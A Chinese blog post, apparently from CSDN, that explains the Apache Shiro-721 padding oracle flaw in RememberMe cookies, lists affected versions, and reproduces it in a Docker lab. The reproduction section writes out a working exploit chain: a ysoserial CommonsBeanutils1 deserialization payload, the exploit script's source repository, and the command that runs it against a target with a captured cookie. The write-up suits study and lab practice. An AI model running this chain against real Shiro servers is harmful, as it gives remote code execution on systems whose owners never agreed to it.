Shiro-721漏洞详解及复现

7 篇文章 0 订阅
7 篇文章 0 订阅

之前有些Shiro-550反序列化漏洞的文章Shiro-550漏洞详解及复现_shiro框架漏洞-CSDN博客

这里简单补充一下关于Shiro-721漏洞的内容。

目录

Shiro-721漏洞原理

Padding Oracle攻击

利用条件

影响版本

漏洞复现


Shiro-721漏洞原理

Shiro-721用到的加密方式是AES-128-CBC,跟Shiro-550最大的区别就是AES加密的key基本上猜不到了,是系统随机生成的。

但是这种加密方式容易受到Padding Oracle Attack(填充提示攻击),能够利用有效的RememberMe Cookie作为Padding Oracle Attack的前缀,然后精心构造RememberMe Cookie值可以实现反序列化漏洞攻击。实质是跟Shiro-550一样的。

Padding Oracle攻击

这里的Padding是“填充”的意思,因为对于加密算法来说(如DES),是要进行“填充”形成完整的块然后分段进行加密的。对于密文被解密时也是分段进行的,在解密完成之后算法会先检查是否符合规则,如果它的Padding填充方式不符合规则,那么表示输入数据有问题,会抛出一个Padding Error异常。

Padding Oracle攻击简单理解据说,黑客已知一个合法密文,可以通过不断向网站发送篡改过的密文,观察是否有Padding异常错误提示,如果有异常错误提示即可不断向网站程序提供密文,让解密程序给出错误提示,进而不断地修正,从而最终获得混淆之前的中间密文。拿到中间密文之后,就可以通过构造IV(初始向量),使得中间密文被逆向混淆之后得到的明文为指定内容,从而达到攻击的目的。

在这个过程中,Padding Oracle攻击并没有破解掉加密算法的密钥,也没有能力对任意密文做逆向解密,只是可以利用一个有效的密文,生成一个解密后得到任意指定内容明文的伪造密文。

利用条件

根据上面的眼原理也可以得出利用该漏洞需要以下几个条件:

  • 攻击者能够获取到密文,以及IV向量(相对于登录页面的就是知道正确的账号密码对应的Cookie)
  • 攻击者能够修改密文触发解密过程,解密成功和解密失败存在差异性(也就是说需要存在Shiro反序列化漏洞,且有类似于登录成功和失败这种差异)

影响版本

该漏洞影响版本为Apache Shiro 
1.2.5
1.2.6
1.3.0
1.3.1
1.3.2
1.4.0-RC2
1.4.0
1.4.1

漏洞复现

基于docker搭建

git clone https://github.com/inspiringz/Shiro-721.git
cd Shiro-721/Docker
docker build -t shiro-721 .
docker run -p 8080:8080 -d shiro-721

 

首先先使用ysoserial工具对恶意语句进行序列化

java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/123" > payload.class

登录成功后将其中的RememberMe字段复制到工具中进行利用:

python2 shiro_exp.py http://192.168.111.121:8080/login.jsp dn02+4V8ELKMLgay8k17HfDtU6eHyvqELqEebUmq5911xfqV2+GsXLDNAgG7qPJc1tQypjGVo/AVhJb5qwhe3vH5LBlqT5GLhz6STPMzvLaFG0xQBCNXsTfRgmBm0K2ZDO5SKW7sgFHmB91ayfrofoifYA5hH3CHYmEtZ7SqH1xEXH4/VT6NBe0h9akLvLyyVqPWkYD4Dv8NGA2EamH1vGSF72f3bEtO/9uBwqF69WVP1PhGB+1fZ7DMtBSsF8YvQkx8DbILhbX+jzItYfllnB/F1GfTPa/lCNTDiOcANaajJfB1i9qacQZvKEGXMeWG4Hx5oaRYm2lvgP/0TrohSJLXPyh1tEJTszxS9hdDhXb6QugkPC57jwT/T4aabZIJs4b05P3Ez+sdOGPtWA4QkxUmfUipigA/KuE1uJ2INRIm3YZlNR1sQ6H64YgJpFu5CrpoCLh2lGBP7Ip8IKeXPwDQpMi8E5gnCBVYBxBUNJ6cs4Y2h+iDpeu/mjAEgkJX payload.class

这里的shiro_exp.py下载地址是:https://github.com/wuppp/shiro_rce_exp

这里是将cookie的RememberMe的部分作为前缀,然后放入工具进行爆破,爆破大概需要一个小时左右,需要耐心等待,爆破成功后就停止,并且返回cookie。

最终跑出的cookie拼接到请求中,可以在/tmp目录下看到创建的文件。

  • 15
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值